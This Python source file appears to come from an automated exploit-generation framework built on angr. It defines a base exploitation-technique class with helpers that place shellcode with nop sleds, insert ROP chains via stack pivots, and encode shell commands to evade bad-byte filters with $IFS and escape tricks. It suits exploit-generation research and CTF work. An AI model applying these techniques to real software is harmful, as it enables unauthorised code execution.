import os
import re
import angr
import logging
from abc import abstractmethod

from angrop.errors import RopException
from ..exploit import CannotExploit


# Module-level logger shared by all techniques. Reasons why a technique's check() fails are
# logged at INFO level; uncomment the setLevel call below to have them printed.
l = logging.getLogger(name="rex.exploit.technique")
# l.setLevel(logging.INFO)


class Technique:
    """
    Represents an exploitation technique.

    Concrete techniques implement :meth:`check` and :meth:`apply`; the remaining methods are
    shared helpers for placing data, ROP chains and shellcode into the crashing state.
    """

    # technique name; used as the prefix of check_fail_reason log messages
    name = None
    # NOTE(review): presumably the targets this technique supports, overridden by subclasses -- confirm
    applicable_to = [ ]
    # reduce_claimed_bitmask only gives bits back while more than this many bits are claimed
    bitmask_threshold = 20

    def __init__(self, crash: 'rex.Crash', rop, shellcode: 'rex.exploit.ShellcodeFactory'):
        """
        :param crash: a crash object representing the state at crash time; a copy (``crash.copy()``)
                      is kept because helpers below reassign ``self.crash.state``
        :param rop: an angr rop object for finding and requesting chains
        :param shellcode: a shellcode manager to query for shellcode
        """

        self.crash = crash.copy()
        self.rop = rop
        self.libc_rop = crash.libc_rop
        self.shellcode = shellcode

    @abstractmethod
    def check(self):
        """
        Performs checks to determine whether this technique can be applied on the target binary with the given crash.
        Returning False will prevent the attempt of applying this technique.

        :return:    True if this technique may work, False otherwise.
        :rtype:     bool
        """
        return True

    def check_fail_reason(self, reason):
        """
        Log (at INFO level) why the check fails.

        :param str reason:  A reason for why the check fails.
        :return:            None
        """

        l.info("[-] %s: %s", self.name, reason)

    @abstractmethod
    def apply(self, **kwargs):
        """
        Applies the exploit technique to the crashing state, returns a working Exploit object
        or raises a CannotExploit exception

        :return: an Exploit object
        """

        raise NotImplementedError

    @property
    def _is_stack_executable(self):
        """Whether the main binary is marked as having an executable stack (its ``execstack`` flag)."""
        return self.crash.project.loader.main_object.execstack

    #
    # Exploit helpers
    #

    def reduce_claimed_bitmask(self, bitmask, bitcnt, num_bytes=4):
        """
        Conservatively shrink a controlled bitmask.

        There could be unmodelled input constraints such as no "\\n" or no null bytes, so for each
        fully controlled byte we give up its top bit (claiming only 7/8 of its bits), for as long as
        more than ``self.bitmask_threshold`` controlled bits remain.

        :param bitmask:   the controlled bitmask
        :param bitcnt:    the number of controlled bits in ``bitmask``
        :param num_bytes: how many low-order bytes of ``bitmask`` to consider; bits above them are
                          dropped from the result. Defaults to 4 (the original 32-bit behaviour).
        :return:          the new bitmask
        """

        out_mask = 0

        for byte_index in range(num_bytes):
            shift = 8 * byte_index
            byte = (bitmask >> shift) & 0xff
            # if the byte has all bits set and we have extra bits, unset its top bit
            if byte == 0xff and bitcnt > self.bitmask_threshold:
                bitcnt -= 1
                byte = 0x7f
            out_mask |= byte << shift

        return out_mask

    @staticmethod
    def check_bitmask(state, ast, bitmask):
        """
        Quick sanity check that the bits of ``ast`` selected by ``bitmask`` really are controllable.

        The masked bits must be able to take each of a few fixed bit patterns: all zeros, all ones,
        two alternating-bit patterns, and a pattern whose bytes differ from each other. The patterns
        are 64 bits wide and are truncated to the width of ``ast``.

        :param state:   the state whose solver is queried
        :param ast:     the bitvector expression to test
        :param bitmask: the bits of ``ast`` claimed to be controlled
        :return:        True if every pattern is satisfiable, False otherwise
        """
        modulus = 1 << ast.size()
        test_vals = (
            0x0,
            modulus - 1,
            int("1010"*16, 2) % modulus,
            int("0101"*16, 2) % modulus,
            # chars need to be able to be different
            int(("1001"*2 + "1010"*2 + "1011"*2 + "1100"*2 + "1101"*2 + "1110"*2 + "1110"*2 + "0001"*2), 2)
            % modulus,
        )
        for test_val in test_vals:
            if not state.solver.satisfiable(extra_constraints=(ast & bitmask == test_val & bitmask,)):
                return False
        return True

    def get_bitmask_for_var(self, state, var):
        """
        Compute which bits of ``var`` are under symbolic control in ``state``.

        Every bit is tested individually (can it take two values?). The resulting mask is shrunk
        with :meth:`reduce_claimed_bitmask` and validated with :meth:`check_bitmask`.

        :param state: the state whose solver is queried
        :param var:   the bitvector expression to analyze
        :return:      a ``(bitmask, bitcnt)`` tuple; ``(0, 0)`` if ``var`` can only take one value
        :raises CannotExploit: if the reduced bitmask fails :meth:`check_bitmask`
        """

        # filter vars with only one value
        if len(state.solver.eval_upto(var, 2)) == 1:
            return 0, 0

        # test each bit of the var
        unconstrained_bitmask = 0
        unconstrained_bitcnt = 0
        for bit in range(var.size()):
            l.debug("testing symbolic control of bit %d in var %s", bit, var)
            if len(state.solver.eval_upto(var & 1 << bit, 2)) == 2:
                unconstrained_bitcnt += 1
                unconstrained_bitmask |= (1 << bit)
        l.debug("unconstrained bitmask %#x", unconstrained_bitmask)

        # reduce the number of claimed bits
        unconstrained_bitmask = self.reduce_claimed_bitmask(unconstrained_bitmask, unconstrained_bitcnt)
        unconstrained_bitcnt = bin(unconstrained_bitmask).count("1")

        if not self.check_bitmask(state, var, unconstrained_bitmask):
            raise CannotExploit("computed bitmask does not appear to be valid")

        l.debug("reduced bitmask %#x", unconstrained_bitmask)
        return unconstrained_bitmask, unconstrained_bitcnt

    def _write_some_data(self, data, control, alignment=1, good_addr=None):
        """
        Yield every placement of ``data`` inside controlled memory that the solver accepts.

        :param data:      the bytes to place
        :param control:   mapping of region base address -> region length
        :param alignment: required alignment of the placement address
        :param good_addr: optional predicate; addresses for which it returns False are skipped
        :return:          generator of ``(addr, constraint)`` tuples, where adding ``constraint``
                          makes memory at ``addr`` equal ``data``
        """
        def align_up(v, align):
            return (v + align - 1) - (v + align - 1) % align

        # candidates are spaced by len(data) rounded down to the alignment, but never by less than
        # one alignment unit: a step of 0 (short or empty data) would make range() raise ValueError
        step = max(alignment, len(data) - len(data) % alignment)
        if good_addr is None:
            good_addr = lambda addr: True
        for base, size in control.items():
            for addr in range(align_up(base, alignment), base + size - len(data) + 1, step):
                if not good_addr(addr):
                    continue
                constraint = self.crash.state.memory.load(addr, len(data)) == data
                if self.crash.state.solver.satisfiable(extra_constraints=(constraint,)):
                    yield addr, constraint

    def _write_global_data(self, data, **kwargs):
        '''
        write @data into globally addressable memory
        Candidates from the binary's controlled memory come first, then (if a libc rop object is
        available) those from libc's controlled memory.
        :param kwargs: forwarded to _write_some_data (alignment, good_addr)
        :return: generator of (address of the string, constraint which adds the string) tuples
        '''
        yield from self._write_some_data(data, self.crash.memory_control(), **kwargs)
        if self.libc_rop is not None:
            yield from self._write_some_data(data, self.crash.libc_memory_control(), **kwargs)

    def _write_executable_global_data(self, data, **kwargs):
        '''
        like _write_global_data, but only yields addresses that lie in an executable segment
        '''
        def good_addr(addr):
            segment = self.crash.state.project.loader.find_segment_containing(addr)
            # the lookup may find no segment at all (None); such addresses are rejected
            return segment is not None and segment.is_executable
        return self._write_global_data(data, good_addr=good_addr, **kwargs)

    def _write_with_ROP(self, data):
        """
        write @data into globally addressable memory using ROP
        :return: tuple of the address of the string and the constraint which adds the string,
                 or (None, None) if no rop object is available or no chain could be built
        """
        if self.rop is None:
            return None, None

        addr = self._find_global_address_for_string(data)
        try:
            # use the same rop object that was checked above
            chain = self.rop.write_to_mem(addr, data)
        except RopException:
            return None, None

        self._insert_chain_and_windup(chain)
        return addr, self._global_data_constraint(addr, data)

    def _insert_chain_and_windup(self, chain):
        """
        Place ``chain`` via _ip_overwrite_with_chain, constrain the crash state's memory to hold it,
        then wind the crash state up to its first unconstrained successor.

        :raises CannotExploit: if the chain cannot be inserted or no unconstrained successor is reached
        """
        chain, chain_addr = self._ip_overwrite_with_chain(chain)

        # constrain the address to be the chain
        payload = chain.payload_str()
        chain_mem = self.crash.state.memory.load(chain_addr, len(payload))
        chain_bvv = self.crash.state.solver.BVV(payload)
        # the chain should be guaranteed to be satisfiable here
        self.crash.state.add_constraints(chain_mem == chain_bvv)

        # TODO make sure we can still read an unconstrained successor
        # windup the state to introduce the new bytes and fix up the state for inserting other chains
        self._windup_to_unconstrained_successor()

    def _global_data_constraint(self, addr, data):
        """Return a constraint requiring the current crash state's memory at ``addr`` to equal ``data``."""
        glob_data = self.crash.state.memory.load(addr, len(data))
        data_bvv = self.crash.state.solver.BVV(data)
        return glob_data == data_bvv

    def _find_global_address_for_string(self, data):
        """Address just below the end (``max_addr``) of the main object where ``data`` fits."""
        return self.crash.project.loader.main_object.max_addr - len(data)

    def _read_in_global_data(self, data):
        '''
        call a read with rop into globally addressable memory
        tries the linked read first, then gets
        :return: tuple of the address and constraints to add, or (None, None) on failure
        '''

        if self.rop is None:
            return None, None

        # turn off file size limit
        self.crash.state.posix.stdin.has_end = False

        # first try doing it with a call to read
        addr, cons = self._read_in_global_data_with_read(data)
        if addr is not None:
            return addr, cons

        # next try it with a call to gets
        addr, cons = self._read_in_global_data_with_gets(data)
        if addr is not None:
            return addr, cons

        return None, None

    def _read_in_global_data_with_read(self, data):
        '''
        use the linked function read to read in more global data
        :return: tuple of the address and constraints to add
        '''
        read_to = self._find_global_address_for_string(data)
        # TODO add an option for preferred file descriptor here
        return self._read_in_global_data_with_func("read", [0, read_to, len(data)], read_to, data)

    def _read_in_global_data_with_gets(self, data):
        '''
        use the linked function gets to read in more global data
        :return: tuple of the address and constraints to add
        '''
        read_to = self._find_global_address_for_string(data)
        return self._read_in_global_data_with_func("gets", [read_to], read_to, data)

    def _read_in_global_data_with_func(self, func_name, args, read_to, data):
        '''
        call the linked function @func_name with @args through a ROP chain, expecting it to read
        @data into memory at @read_to
        :return: tuple of the address and constraints to add, or (None, None) if the function is
                 not linked or no chain could be built
        '''
        addr = self._find_func_address(func_name)
        # failed to find address
        if addr is None:
            return None, None

        try:
            chain = self.rop.func_call(addr, args)
        except RopException:
            return None, None

        self._insert_chain_and_windup(chain)
        return read_to, self._global_data_constraint(read_to, data)

    def _find_func_address(self, symbol):
        '''
        find the address of a function given its name @symbol
        the main object's PLT entry is preferred over its symbol table
        :param symbol: function name to lookup
        :return: the function's address or None if the function is not present
        '''

        main_object = self.crash.project.loader.main_object
        if symbol in main_object.plt:
            return main_object.plt[symbol]
        symobj = main_object.get_symbol(symbol)
        return symobj.rebased_addr if symobj is not None else None

    def _find_libc_func_address(self, symbol):
        '''
        look up @symbol in the main object of the libc rop project
        :return: the symbol's rebased address, or None if it is missing or no libc rop is available
        '''
        if self.libc_rop is None:
            return None
        symobj = self.libc_rop.project.loader.main_object.get_symbol(symbol)
        return symobj.rebased_addr if symobj else None

    def _windup_to_unconstrained_successor(self, state=None):
        '''
        windup of the state of the crash to the first unconstrained successor

        Follows the first flat successor until a step yields an unconstrained successor, appends
        that successor's recent actions to crash.added_actions and makes it the new crash.state.
        :param state: state to start from (defaults to the crash state)
        :return: the new crash state
        :raises CannotExploit: if a state with neither unconstrained nor flat successors is reached
        '''

        if state is None:
            state = self.crash.state

        successors = self.crash.project.factory.successors(state)
        if len(successors.unconstrained_successors) == 0:
            if len(successors.flat_successors) == 0:
                raise CannotExploit("unable to reach an unconstrained successor")
            return self._windup_to_unconstrained_successor(successors.flat_successors[0])

        # extend the prev actions path the actions encountered
        self.crash.added_actions.extend(successors.unconstrained_successors[0].history.recent_actions)
        self.crash.state = successors.unconstrained_successors[0]
        return self.crash.state

    def _at_syscall(self, path):
        '''
        whether the single instruction at @path.addr ends in a syscall jumpkind (Ijk_Sys*)
        '''

        return self.crash.project.factory.block(path.addr,
                num_inst=1).vex.jumpkind.startswith("Ijk_Sys")

    def _windup_to_syscall(self, state):
        '''
        windup state to a state just about to make a syscall
        follows the first flat successor at every step
        :raises CannotExploit: if a state without flat successors is reached first
        '''

        if self._at_syscall(state):
            return state

        successors = self.crash.project.factory.successors(state)
        if len(successors.flat_successors) > 0:
            return self._windup_to_syscall(successors.flat_successors[0])

        raise CannotExploit("unable to reach syscall instruction")

    def _ip_overwrite_call_shellcode(self, shellcode, variables=None):
        '''
        exploit an ip overwrite with shellcode. This is HIGHLY CGC-specific.

        Candidate regions are executable symbolic memory (only when ASLR is off) and, for Linux
        binaries with an executable stack, the controlled global memory. Placements are tried from
        the end of each region down to its very first byte; if bytes remain before the shellcode,
        a 0x90 nop sled covering them is attempted as well.

        :param shellcode: shellcode to call; presumably a bitvector, since len(shellcode)//8 is
                          used as its size in bytes
        :param variables: variables to check unconstrainedness of
        :return: tuple of the address to jump to, and address of requested shellcode in memory
        :raises CannotExploit: if the shellcode fits nowhere
        '''

        # TODO inspect register state and see if any registers are pointing to symbolic memory
        # if any registers are pointing to symbolic memory look for gadgets to call or jmp there

        if variables is None:
            variables = [ ]

        state = self.crash.state
        shc_len = len(shellcode) // 8

        # accumulate valid memory, this depends on the os and memory permissions
        valid_memory = { }

        # TODO: expand this into some more concrete notion of what addresses we understand
        if not self.crash.aslr:
            for mem in self.crash.symbolic_mem:
                # ask if the mem is executable
                prots = state.memory.permissions(mem)
                if state.solver.eval(prots) & 4: # PROT_EXEC is 4
                    valid_memory[mem] = self.crash.symbolic_mem[mem]

        # XXX linux special case, bss is executable if the stack is executable
        if self._is_stack_executable and self.crash.is_linux:
            valid_memory.update(self.crash.memory_control())

        # hack! max address heuristic for CGC
        for mem, size in sorted(valid_memory.items(),
                key=lambda x: (0xffffffff - x[0]) + x[1], reverse=True):
            # the stop value is mem - 1 so that the first byte of the region is a candidate too
            for mem_start in range(mem + size - shc_len, mem - 1, -1):

                # default jump addr is the shellcode
                jump_addr = mem_start

                shc_constraints = [state.regs.ip == mem_start]

                sym_mem = state.memory.load(mem_start, shc_len)
                shc_constraints.append(sym_mem == shellcode)

                # hack! TODO: make this stronger/more flexible
                # NOTE(review): every caller-supplied variable is pinned to 0x41414141, presumably to
                # check it can still take an arbitrary value alongside the shellcode -- confirm intent
                for v in variables:
                    shc_constraints.append(v == 0x41414141)

                if not state.solver.satisfiable(extra_constraints=shc_constraints):
                    continue

                # room for a nop sled?
                length = mem_start - mem
                if length > 0:

                    # try to add a nop sled, we could be more thorough, but it takes too
                    # much time
                    sym_nop_mem = state.memory.load(mem, length)
                    nop_sld_bvv = state.solver.BVV(b"\x90" * length)

                    new_nop_constraints = [
                        # can the nop sled exist?
                        sym_nop_mem == nop_sld_bvv,
                        # can the shellcode still exist?
                        sym_mem == shellcode,
                        # can ip point to the nop sled?
                        state.regs.ip == mem,
                    ]

                    if state.solver.satisfiable(extra_constraints=new_nop_constraints):
                        jump_addr = mem

                return jump_addr, mem_start

        raise CannotExploit("no place to fit shellcode")

    def _ip_overwrite_with_chain(self, chain, state=None, assert_next_ip_controlled=False, rop=None):
        """
        exploit an ip overwrite using rop

        For each controlled stack region large enough for the chain plus one word, first try
        pointing sp directly at the region (with pc set to the chain's first value); otherwise look
        for a gadget from ``rop.gadgets`` whose stack change lands sp inside the region.

        :param chain: rop chain to use
        :param state: an optional state to work off of (defaults to the crash state)
        :param assert_next_ip_controlled: if set we use heuristics to ensure control of the next ip
        :param rop: an optional rop object whose gadgets are tried as stack pivots (defaults to self.rop)
        :return: a tuple containing a new constrained chain and the address to place the chain
        :raises CannotExploit: if there is no controlled stack data or the chain cannot be inserted
        """
        if rop is None:
            rop = self.rop

        if state is None:
            state = self.crash.state

        word_size = self.crash.project.arch.bytes
        sp = state.solver.eval(state.regs._sp)

        # first let's see what kind of stack control we have
        symbolic_stack = self.crash.stack_control()
        if len(symbolic_stack) == 0:
            l.warning("no controlled data beneath stack, need to resort to shellcode")
            raise CannotExploit("no controlled data beneath sp")

        # increase payload length by wordsize for the final ip hijack
        chain_req = chain.payload_len + word_size

        # loop until we can find a chain which gets us to our setter gadget
        for addr in symbolic_stack:
            # is the space too small?
            if symbolic_stack[addr] < chain_req:
                continue

            # if we can directly pivot to the symbolic region, do it
            # the assumption is the first value in the chain is a code address
            # it sounds like a reasonable assumption to me. But I can be wrong.
            chain_constraints = [state.regs.sp == addr, state.regs.pc == chain._values[0][0]]
            if state.solver.satisfiable(extra_constraints=chain_constraints):
                chain_addr = addr
                # the first chain value is consumed by pc, so drop it from the returned chain
                chain_cp = chain.copy()
                chain_cp._values = chain_cp._values[1:]
                chain_cp.payload_len -= word_size
                # extra checks for ip control
                # NOTE(review): a failure here skips the gadget-pivot search for this region
                if assert_next_ip_controlled:
                    ip_bv = state.memory.load(chain_addr + chain.payload_len, word_size)
                    if not state.solver.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x41414141]):
                        continue
                    if not state.solver.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x56565656]):
                        continue

                for expr in chain_constraints:
                    state.solver.add(expr)
                return chain_cp, addr

            # okay we have a symbolic region which fits and is below sp
            # can we pivot there?
            for gadget in rop.gadgets:
                # let's make sure the gadget is sane

                # TODO: consult state before throwing out a gadget, some of these memory
                # accesses might be acceptable
                if len(gadget.mem_changes + gadget.mem_writes + gadget.mem_reads) > 0:
                    continue

                if gadget.bp_moves_to_sp:
                    # it'd better not touch sp
                    continue

                # FIXME: this assumption is very wrong
                # if we assume all gadgets end in a 'ret' we can subtract 4 from the stack_change
                # as we're not interested in the ret's effect on stack movement, because when the
                # ret executes we'll have chain control
                jumps_to = sp + (gadget.stack_change - word_size)
                # does it hit the controlled region?
                if not (addr <= jumps_to < addr + symbolic_stack[addr]):
                    continue

                # it lands in a controlled region, but does our chain fit?
                offered_size = symbolic_stack[addr] - (jumps_to - addr)
                if offered_size < chain_req:
                    continue

                # we're in!
                chain_addr = jumps_to
                scratch = state.copy()
                chain_cp = chain.copy()

                # test to see if things are still satisfiable
                chain_constraints = [state.regs.ip == gadget.addr]

                # TODO: update rop to make this possible without refering to internal vars
                # we constrain our rop chain to being equal to our payload, preventing the chain builder
                # from putting illegal characters into positions we don't care about
                for cons in chain_cp._blank_state.solver.constraints:
                    scratch.add_constraints(cons)

                chain_bytes = chain_cp.payload_bv()
                payload_bytes = scratch.memory.load(chain_addr, chain.payload_len)

                scratch.add_constraints(chain_bytes == payload_bytes)

                chain_cp._blank_state = scratch

                mem = state.memory.load(chain_addr, chain_cp.payload_len)

                try:
                    cbvv = state.solver.BVV(chain_cp.payload_str())
                except angr.SimUnsatError:
                    # it's completely possible that the values we need in the chain can't exist due to
                    # constraints on memory, for example if we need the value '1' to exist in our chain, when
                    # our chain enters the process memory space with a 'strcpy', '1' cannot exist because its
                    # value will contain null bytes
                    continue # the chain itself cannot exist here

                chain_constraints.append(mem == cbvv)

                # if the chain can't be placed here, let's try again
                if not state.solver.satisfiable(extra_constraints=chain_constraints):
                    continue

                # extra checks for ip control
                if assert_next_ip_controlled:
                    ip_bv = scratch.memory.load(chain_addr + chain.payload_len, word_size)
                    if not state.solver.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x41414141]):
                        continue
                    if not state.solver.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x56565656]):
                        continue

                # constrain eip to equal the stack pivot gadget
                state.add_constraints(state.regs.ip == gadget.addr)
                return chain_cp, chain_addr

        raise CannotExploit("[general_technique] unable to insert chain")

    def _get_libc_obj(self):
        '''
        locate the loaded libc object via the tracer's memory mapping
        :return: the loader object containing the first libc-like mapping, or None if none is mapped
        '''

        # grab the memory mapping
        mapping = self.crash.tracer.angr_project_bow._mem_mapping

        # make sure there is only one libc
        lib_names = [x for x in mapping.keys() if re.match(r"^(libuC)?libc(\.|-)", os.path.basename(x))]
        if not lib_names:
            return None
        if len(lib_names) > 1:
            l.warning("more than 1 potential libc detected: %s", lib_names)

        # return libc object if it exists in angr
        libc_addr = mapping[lib_names[0]]
        return self.crash.project.loader.find_object_containing(libc_addr)

    def _get_libc_func_addr(self, func_name):
        '''
        :return: the rebased address of @func_name in the loaded libc object, or None if libc or
                 the symbol cannot be found
        '''

        libc_obj = self._get_libc_obj()
        if not hasattr(libc_obj, 'symbols_by_name'):
            return None
        if func_name in libc_obj.symbols_by_name:
            return libc_obj.symbols_by_name[func_name].rebased_addr
        return None

    def _encode_cmd(self, cmd_str):
        '''
        make a shell command survive the crash's bad-byte restrictions

        Appends the first allowed terminator (";", newline, NUL, "&&1", "||1"); replaces spaces
        with "$IFS" when spaces are bad; and, if none of "$", "\\", "x" and "'" is bad, rewrites every
        remaining bad byte as an ANSI-C quoted escape $'\\xNN'.
        :param cmd_str: the command, as bytes
        :return: the encoded command, as bytes
        '''
        bad_bytes = self.crash._bad_bytes

        # command ending: the first terminator whose marker byte is allowed
        endings = ((b';', b';'), (b'\n', b'\n'), (b'\x00', b'\x00'), (b'&', b'&&1'), (b'|', b'||1'))
        for marker, ending in endings:
            if marker[0] not in bad_bytes:
                cmd_str += ending
                break

        if ord(b' ') in bad_bytes:
            cmd_str = cmd_str.replace(b' ', b'$IFS')

        # check shell coding
        if any(x in bad_bytes for x in b'$\\x\''):
            return cmd_str
        return b''.join(bytes([c]) if c not in bad_bytes else b"$'\\x%02x'" % c for c in cmd_str)
